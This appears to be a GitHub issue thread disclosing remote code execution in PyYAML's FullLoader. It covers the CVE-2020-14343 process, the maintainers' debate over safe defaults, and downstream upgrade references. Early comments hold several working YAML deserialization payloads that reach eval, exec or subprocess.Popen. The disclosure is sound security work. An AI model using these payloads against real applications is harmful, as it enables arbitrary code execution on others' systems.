.load() and FullLoader still vulnerable to fairly trivial RCE #420

arxenix · 2020-07-22T08:18:35Z

As of 5.3.1 .load() defaults to using FullLoader and FullLoader is still vulnerable to RCE when run on untrusted input. As demonstrated by the examples below, #386 was not enough to fix this issue.

Some example payloads:

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ "RCE_HERE" ]

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "RCE_HERE"

- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec

I do not believe this is entirely fixable unless PyYAML decides to use secure defaults, and make .load() equivalent to .safe_load() ( #5 )

FullLoader should probably be removed, as I don't see the purpose of it.

The text was updated successfully, but these errors were encountered:

ret2libc · 2020-07-23T09:10:38Z

I agree it should be well documented that FullLoader is not safe. A blacklist approach like the one I implemented in #386 is just too hard to maintain and although it can always be improved, it is just easier if users don't expect any kind of security protection from it.

ret2libc · 2020-07-23T11:10:01Z

Is a CVE going to be assigned for this? Also, to "avoid" these kind of problems in the future (and dealing with CVEs and stuff) I think it should be made clear that FullLoader is not safe. Because as it is right now, a user may think it is a good alternative to safe_load while it is not.

arxenix · 2020-07-23T14:17:26Z

I have not filed for a new CVE, but I contacted RedHat to see if the previous one (CVE-2020-1747) could be updated (I don't know if this is standard protocol here or not)

+1 on making it very clear that FullLoader is not safe. As of right now, I believe the only mention of FullLoader is in the page https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation , which claims that it Avoids arbitrary code execution.

ret2libc · 2020-07-23T14:52:47Z

I have not filed for a new CVE, but I contacted RedHat to see if the previous one (CVE-2020-1747) could be updated (I don't know if this is standard protocol here or not)

No, that is not possible. This should get a new CVE, with a wording like "Incomplete fix for CVE-2020-1747 still allows to execute arbitrary code through FullLoader", or something like that.

ret2libc · 2020-07-24T13:05:47Z

@ingydotnet @perlpunk @arxenix Did any of you already requested a CVE (except to Red Hat)? If not, Red Hat can assign the CVE for this.

Also, @ingydotnet what do you intend to do with regard to documenting the unsafe behaviour of FullLoader?

perlpunk · 2020-07-24T15:40:05Z

My personal preference would still be to make SafeLoader the default.
FullLoader is probably not that useful anymore anyway, especially if python/name also gets moved to UnsafeLoader.

arxenix · 2020-07-24T15:55:17Z

@ret2libc I sent a request for a new CVE ID to RedHat already

ingydotnet · 2020-07-24T16:15:31Z

I was considering pulling tag:yaml.org,2002:python/name: from FullLoader construction.
@perlpunk why do you feel that leaves FullLoader irrelevant?

ret2libc · 2020-07-24T16:17:07Z

@ret2libc I sent a request for a new CVE ID to RedHat already

I know, I am from Red Hat. I just want to make sure none else has already requested the CVE to someone else. @ingydotnet @perlpunk did you? Otherwise, I'm going to assign the CVE from the Red Hat pool.

perlpunk · 2020-07-24T16:20:09Z

@ret2libc no, I did not request one.

ingydotnet · 2020-07-24T16:31:42Z

@ret2libc no.

ingydotnet · 2020-07-24T16:44:05Z

@arxenix I'd like to see a FullLoader vulnerabilty that doesn't use tag:yaml.org,2002:python/name:....
An easy fix is remove that constructor.
@ret2libc a release with that fix should not require a doc update.

ingydotnet · 2020-07-24T17:39:09Z

@perlpunk I don't see defaulting to SafeLoader as an option. We have no idea how much code that would break.

...

@everyoneelse,

Let's step back a sec and look at the problem we are trying to solve.
In my opinion "there was no problem" to begin with.

PyYAML was loud and clear in its doc from the first release that PyYAML (a serialization module) had the same vulnerability landscape as Pickle. ie It is not safe to load data from a source you cannot trust. Bad things could happen.

Don't compile and run C code from a web page's textarea.
Don't run Python code from there either.
Don't load a Pickle file you found on the street.
Don't do that with YAML either.

Somewhat ironically, we are encouraged and don't bat an eye about running setup.py or Makefile.PL or Rakefile files to install Python, Perl and Ruby modules. We trust that files pushed to PyPI or committed to GitHub are safe enough.

Who are we trying to protect? This is a literal question. I would like to see the actual applications that are affected. Show me the people that are asking for untraceable YAML from unknown sources and loading it for them with PyYAML.

This "became my problem" when a CVE was filed against PyYAML for something that was effectively "people can get hurt when they use your dining utensils, and don't read the instructions and use it to eat things from a dumpster". Not that I cared about the CVE, since I felt exactly the same as I do now, but the CVE triggered all kinds of production systems. I was forced to take an action that was unnecessary. I never knew who filed the CVE or how to respond to them. I never got a confirmation that the original CVE was closed.

I tried to find a middle ground with warnings to read the docs, be explicit in your code, and provide a safer default.

I agree that the FullLoader safety is proving to be not that useful.

I'm currently leaning towards making FullLoader an alias for UnsafeLoader, keeping that as the default, documenting it, and calling it a day.

arxenix · 2020-07-24T18:19:48Z

@ingydotnet it's still possible to get arbitrary code execution with only !!python/object/new , BTW

!!python/object/new:tuple [!!python/object/new:map [!!python/object/new:type [!!python/object/new:subprocess.Popen {}], ['ls']]]

Ultimately, it's your choice what you decide to do with the library, but let me state my opinions.

I definitely have seen projects in the wild that are loading YAML via yaml.load() from untrusted sources. I can't disclose specific names but one example is a web portal that allowed users to upload YAML config files, and then loaded them. Given some time, I could probably find several on GitHub if you would like.

Developers tend to be lazy, no one wants to read the docs. This is why it's important to follow the principle of having secure defaults. It's important for a library to attempt to protect its users (even if they dont read :p)

Here's a quote from the ReactJS (popular facebook-made frontend library) documentation which explains their reasoning for their function dangerouslySetInnerHTML. I wholeheartedly agree with them.

Improper use of the innerHTML can open you up to a cross-site scripting (XSS) attack. Sanitizing user input for display is notoriously error-prone, and failure to properly sanitize is one of the leading causes of web vulnerabilities on the internet.

Our design philosophy is that it should be “easy” to make things safe, and developers should explicitly state their intent when performing “unsafe” operations. The prop name dangerouslySetInnerHTML is intentionally chosen to be frightening, and the prop value (an object instead of a string) can be used to indicate sanitized data.

After fully understanding the security ramifications and properly sanitizing the data, create a new object containing only the key __html and your sanitized data as the value.

My observations are that the mental model that many developers have of YAML is that it's a simple data interchange format exactly like JSON. Not a complex serialization language. In the same way they don't expect json.load() to lead to code execution, they don't expect yaml.load() to lead to code execution.

I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML's ability to serialize complex objects? I don't have too much insight into this, but my thoughts are -- not many.

From some quick Github code search results that I did, there are ~762k files that use PyYAML. Of those, up to 529k files are currently using the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution. 220k call safe_load or specify SafeLoader, and only 13k explicitly use unsafe_load or specify UnsafeLoader.

perlpunk · 2020-07-24T18:28:54Z

I'm not a python expert, but I think that FullLoader in its current state already prevents (de)serializing most objects as they are dumped with python/object/apply (please correct me if I am wrong). So it might be that a lot of code already had to be modified for PyYAML >= 5 to use UnsafeLoader.

Regarding the default: The problem I see is that most use cases for YAML do not involve serializing objects. Many people simply do not expect the default load method to do full serialization, and many are not even aware that YAML was designed for allowing that. That's different from Pickle.

I think anything different from the default YAML Core Schema (or the basic 1.1 types) should be optional for any YAML implementation.

Yes, it is documented that PyYAML does this, and yes, changing it will break more things (additionally to code that already broke).
I'm just saying what I would expect, and how I would implement a YAML library. Saying "it's documented that it's unsafe" is often not enough.

ingydotnet · 2020-07-24T18:55:45Z

@arxenix @perlpunk These are reasonable points. Thanks for the contrast. I'll sleep on it and reply tomorrow.

arxenix · 2020-07-25T08:19:32Z

This was assigned CVE-2020-14343

ingydotnet · 2020-07-25T15:33:39Z

I am thinking about how to move towards safe_load as the default load() action. I need more time to plan that.

@arxenix, just wondering, can you think of an exploit that involves just !!python/object:__main__.Foo and/or !!python/tuple?
These are the forms for serializing simple instances and tuples.

import yaml

class Foo:
    def __init__(self):
        self.bar = 42

print(yaml.dump(Foo()))
print(yaml.dump(yaml.full_load(yaml.dump(Foo()))))

print(yaml.dump((1,2,3)))
print(yaml.dump(yaml.full_load(yaml.dump((1,2,3)))))

prints:

!!python/object:__main__.Foo
bar: 42

!!python/object:__main__.Foo
bar: 42

!!python/tuple
- 1
- 2
- 3

!!python/tuple
- 1
- 2
- 3

arxenix · 2020-07-25T18:50:37Z

@ingydotnet if it's limited to only those two tags (!!python/tuple and !!python/object:__main__.Foo) I am pretty confident that it's safe.

But the moment you start allowing classes other than __main__.Foo as well (e.g. from other modules, or built-ins) it becomes vulnerable.

If you're concerned about breaking too many projects, maybe a reasonable thing could be to only allow classes from the __main__ namespace. But I feel it's strange behavior, as code would break if it's imported elsewhere.

My recommendation would be to make FullLoader not allow !!python/object/new , !!python/object, !!python/module or !!python/object/apply. The rest of the tags should be fine.

ret2libc · 2020-07-27T08:16:10Z

Also, note that it is written nowhere that FullLoader should not be used on untrusted input (or at least I could not find it). Actually, the documentation says that FullLoader does not execute arbitrary code, so that is why it becomes, again, "your problem" and a CVE-worthy issue. By saying FullLoader: Loads the full YAML language. Avoids arbitrary code execution, users may rely on that "safe" behaviour and they would be at risk from this.

Independently of what you choose for the default load method, I suggest making this point clear in the documentation.

nextgens · 2020-07-28T06:40:03Z

This "became my problem" when a CVE was filed against PyYAML for something that was effectively "people can get hurt when they use your dining utensils, and don't read the instructions and use it to eat things from a dumpster". Not that I cared about the CVE, since I felt exactly the same as I do now, but the CVE triggered all kinds of production systems. I was forced to take an action that was unnecessary. I never knew who filed the CVE or how to respond to them. I never got a confirmation that the original CVE was closed.

I tried to find a middle ground with warnings to read the docs, be explicit in your code, and provide a safer default.

I agree that the FullLoader safety is proving to be not that useful.

I'm currently leaning towards making FullLoader an alias for UnsafeLoader, keeping that as the default, documenting it, and calling it a day.

Have you considered signing (HMACing) the serialized blob to ensure at unserialization time that it is trusted (has been serialized by someone who had the key)? This would solve the security problem and may be done in a way that the current parser ignores... so that existing apps keep functioning and no behaviour change is necessary.

This is a very common way (for other frameworks in other languages) to solve the security problem.
https://snuffleupagus.readthedocs.io/features.html#unserialize-related-magic
https://docs.oracle.com/javase/7/docs/api/java/security/SignedObject.html

ingydotnet · 2020-08-07T00:48:04Z

@ret2libc Agreed. I'll update the doc this weekend, even if it takes longer to decide how to play the whole thing.

axsaucedo · 2020-08-07T07:36:45Z

This also flagged from our side, thanks for looking at this. Just to understand, does that mean the fix will just be mentioning it on the documentation? Would it be posisble to rename the method as "insecure_full_load"? Conscious that just adding this in the docs would not be enough to actually remove this from being a common vulnerability.

Edit: Just caught up with the thread. It sounds like it may require further assessment given projects that would be affected by the breaking change caused by updating the top level load function.

One question, are there currently any capabilities for potential feature flags that could introduce backwards compatibility if this breaking changes was to be introduced? At least until the next major update (e.g. env vars, config file vars, build params, etc)

ret2libc · 2020-09-01T15:26:07Z

Hi, is there any news about this?

encukou · 2020-09-08T11:02:57Z

Hello,
Is there any way I can help to the wiki – https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation#how-to-disable-the-warning – get updated to remove the claim that FullLoader avoids arbitrary code execution?

ingydotnet · 2020-09-08T12:05:54Z

I have an idea of how I'd like to proceed. I'll write about it here this week, and also update the wiki page.

RCE resolved in new version yaml/pyyaml#420

PyYAML 5.4 was released a couple of days ago with a fix for: - https://ubuntu.com/security/CVE-2020-14343 - yaml/pyyaml#420 - https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation The changes otherwise appear to be backwards compatible: - https://github.com/yaml/pyyaml/blob/5.4.1/CHANGES Being able to use a later version is important for companies that have automatic dependency scanning for CVEs.

5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747. A complete fix was debated at yaml/pyyaml#420 and eventually got patched in 5.4.1 Changeset: yaml/pyyaml@3.12...5.4.1 Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>

ocervell · 2021-09-28T17:12:33Z

Any updates on when this might be fixed ?

ingydotnet · 2021-09-28T17:21:40Z

6.0 is ready for beta now. Will go out this week.

Original commit: a001f27 Per suggestion yaml#420 (comment) move a few constructors from full_load to unsafe_load.

5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747. A complete fix was debated at yaml/pyyaml#420 and eventually got patched in 5.4.1 Changeset: yaml/pyyaml@3.12...5.4.1 Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>

yaml deleted a comment from huntr-helper Aug 5, 2020

axsaucedo mentioned this issue Aug 7, 2020

Resolve CVE for PyYAML - CVE-2020-14343 SeldonIO/seldon-core#2252

Closed

kamadorueda mentioned this issue Sep 13, 2020

[Security] Use yaml.SafeLoader instead of yaml.Loader/yaml.FullLoader (same as yaml.UnsafeLoader) awslabs/aws-cfn-template-flip#101

Closed

kennedyshead mentioned this issue Sep 15, 2020

Arbitrary Code Execution in pyaml 5.3.1 home-assistant/core#40102

Closed

jamesjer mentioned this issue Jan 25, 2021

PyYAML 5.4/5.4.1 breaks YAML loader networkx/networkx#4569

Closed

fabaff mentioned this issue Jan 27, 2021

Upgrade pyyaml to 5.4.1 (CVE-2020-14343) home-assistant/core#45624

Merged

21 tasks

qiluo-msft added a commit to sonic-net/sonic-buildimage that referenced this issue Jan 28, 2021

Bump pyyaml from 5.3.1 to 5.4.1 (#6511)

1c8d5ec

RCE resolved in new version yaml/pyyaml#420

lguohan pushed a commit to sonic-net/sonic-buildimage that referenced this issue Feb 3, 2021

Bump pyyaml from 5.3.1 to 5.4.1 (#6511)

8f8520e

RCE resolved in new version yaml/pyyaml#420

deran1980 pushed a commit to deran1980/sonic-buildimage that referenced this issue Feb 4, 2021

Bump pyyaml from 5.3.1 to 5.4.1 (sonic-net#6511)

b1b3f9b

RCE resolved in new version yaml/pyyaml#420

kga mentioned this issue Feb 11, 2021

Update PyYAML to 5.4.1 to fix installation error on Python3.9 motemen/homebrew-furoshiki2#3

Merged

anli5005 mentioned this issue May 19, 2021

Add Challenge Checker 2 BCACTF/bcactf-2.0#34

Merged

ajdecon mentioned this issue Aug 24, 2021

Current Container and source has issues NVIDIA/ngc-container-replicator#28

Closed

chriddyp mentioned this issue Feb 7, 2022

MarkdownAIO plotly/dash-labs#82

Closed

10 tasks

tony-- mentioned this issue Mar 15, 2022

Require pyyaml 6.0+ due to CVE-2020-14343 oneapi-src/oneAPI-samples#890

Closed

3 tasks

perlpunk pushed a commit to perlpunk/pyyaml that referenced this issue Aug 2, 2022

Fix for CVE-2020-14343

cac92d7

Original commit: a001f27 Per suggestion yaml#420 (comment) move a few constructors from full_load to unsafe_load.

perlpunk pushed a commit to perlpunk/pyyaml that referenced this issue Aug 2, 2022

Fix for CVE-2020-14343

66a7619

Original commit: a001f27 Per suggestion yaml#420 (comment) move a few constructors from full_load to unsafe_load.

Dirac231 mentioned this issue Aug 16, 2022

Code Execution via unsafe method used in "snerg/nerf/utils.py" google-research/google-research#1239

Closed

progala mentioned this issue Aug 24, 2022

Dev python exercise 1 pke11y/gt-engineer-review#10

Open

johnmarkpittman mentioned this issue Dec 6, 2022

Update _magics.py vega/altair#2747

Merged

This was referenced Dec 26, 2022

Bump wheel from 0.32.1 to 0.38.1 threatworx/twigs#10

Open

Bump setuptools from 40.2.0 to 65.5.1 threatworx/twigs#11

Open

IKarasynskyi-SPD mentioned this issue Apr 28, 2023

SPHX-FOSS-CRITICAL-Arbitrary Code Execution Security-Phoenix-demo/Damn_Vulnerable_C_Program#37

Open

AlbertSusanto mentioned this issue Aug 22, 2023

YAML Constructor Error when adding import_schema_path parameter to pipeline dlt-hub/dlt#575

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.load() and FullLoader still vulnerable to fairly trivial RCE #420

.load() and FullLoader still vulnerable to fairly trivial RCE #420

arxenix commented Jul 22, 2020 •

edited

Loading

ret2libc commented Jul 23, 2020

ret2libc commented Jul 23, 2020

arxenix commented Jul 23, 2020 •

edited

Loading

ret2libc commented Jul 23, 2020

ret2libc commented Jul 24, 2020

perlpunk commented Jul 24, 2020

arxenix commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

ret2libc commented Jul 24, 2020

perlpunk commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

ingydotnet commented Jul 24, 2020 •

edited

Loading

arxenix commented Jul 24, 2020

perlpunk commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

arxenix commented Jul 25, 2020

ingydotnet commented Jul 25, 2020

arxenix commented Jul 25, 2020

ret2libc commented Jul 27, 2020

nextgens commented Jul 28, 2020 •

edited

Loading

ingydotnet commented Aug 7, 2020

axsaucedo commented Aug 7, 2020 •

edited

Loading

ret2libc commented Sep 1, 2020

encukou commented Sep 8, 2020

ingydotnet commented Sep 8, 2020

ocervell commented Sep 28, 2021

ingydotnet commented Sep 28, 2021

.load() and FullLoader still vulnerable to fairly trivial RCE #420

.load() and FullLoader still vulnerable to fairly trivial RCE #420

Comments

arxenix commented Jul 22, 2020 • edited Loading

ret2libc commented Jul 23, 2020

ret2libc commented Jul 23, 2020

arxenix commented Jul 23, 2020 • edited Loading

ret2libc commented Jul 23, 2020

ret2libc commented Jul 24, 2020

perlpunk commented Jul 24, 2020

arxenix commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

ret2libc commented Jul 24, 2020

perlpunk commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

ingydotnet commented Jul 24, 2020 • edited Loading

arxenix commented Jul 24, 2020

perlpunk commented Jul 24, 2020

ingydotnet commented Jul 24, 2020

arxenix commented Jul 25, 2020

ingydotnet commented Jul 25, 2020

arxenix commented Jul 25, 2020

ret2libc commented Jul 27, 2020

nextgens commented Jul 28, 2020 • edited Loading

ingydotnet commented Aug 7, 2020

axsaucedo commented Aug 7, 2020 • edited Loading

ret2libc commented Sep 1, 2020

encukou commented Sep 8, 2020

ingydotnet commented Sep 8, 2020

ocervell commented Sep 28, 2021

ingydotnet commented Sep 28, 2021

arxenix commented Jul 22, 2020 •

edited

Loading

arxenix commented Jul 23, 2020 •

edited

Loading

ingydotnet commented Jul 24, 2020 •

edited

Loading

nextgens commented Jul 28, 2020 •

edited

Loading

axsaucedo commented Aug 7, 2020 •

edited

Loading